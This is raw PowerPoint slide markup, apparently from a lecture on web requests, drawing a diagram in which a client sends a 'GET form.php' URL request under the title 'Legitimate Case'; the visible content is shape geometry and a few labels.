              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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12" name="object 12"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9507897" y="4657005"/>
            <a:ext cx="117094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form.p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3329939"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2497454"/>
            <a:chExt cx="4686935" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2634255"/>
              <a:ext cx="4686935" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524756" y="135868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519076" y="140846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515897" y="147409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515433" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517898" y="161903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522948" y="167509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4529534" y="170650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536811" y="171100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543933" y="168634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686427" y="85449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="71606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4536612" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4529312" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522749" y="3694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517771" y="9376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515306" y="16498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515770" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518949" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524629" y="35411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543806" y="2391"/>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2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142354" y="2934461"/>
              <a:ext cx="258445" cy="258445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="258445" h="258444">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1" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679444" y="475995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190744" y="3467608"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-93" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867437"/>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24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867438"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="513067">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 2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128" y="450638"/>
            <a:ext cx="4804833" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Case</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="795867" y="3127757"/>
            <a:ext cx="2167467" cy="2031153"/>
            <a:chOff x="596900" y="2345817"/>
            <a:chExt cx="1625600" cy="1523365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="2358517"/>
              <a:ext cx="1600200" cy="1497965"/>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5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="2358517"/>
              <a:ext cx="1600200" cy="1497965"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1600200" h="1497964">
                  <a:moveTo>
                    <a:pt x="0" y="1497838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1600200" y="1497838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1497838"/>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9645" y="3375660"/>
            <a:ext cx="1838960" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140527" y="3026156"/>
            <a:ext cx="10724727" cy="2900680"/>
            <a:chOff x="855395" y="2269617"/>
            <a:chExt cx="8043545" cy="2175510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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14" name="object 14"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 17"/>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8" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9507897" y="4657005"/>
            <a:ext cx="117094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form.p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3329939"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2497454"/>
            <a:chExt cx="4686935" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2634255"/>
              <a:ext cx="4686935" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524756" y="135868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519076" y="140846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515897" y="147409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515433" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517898" y="161903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522948" y="167509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4529534" y="170650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536811" y="171100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543933" y="168634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686427" y="85449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="71606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4536612" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4529312" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522749" y="3694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517771" y="9376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515306" y="16498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515770" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518949" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524629" y="35411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543806" y="2391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536612" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
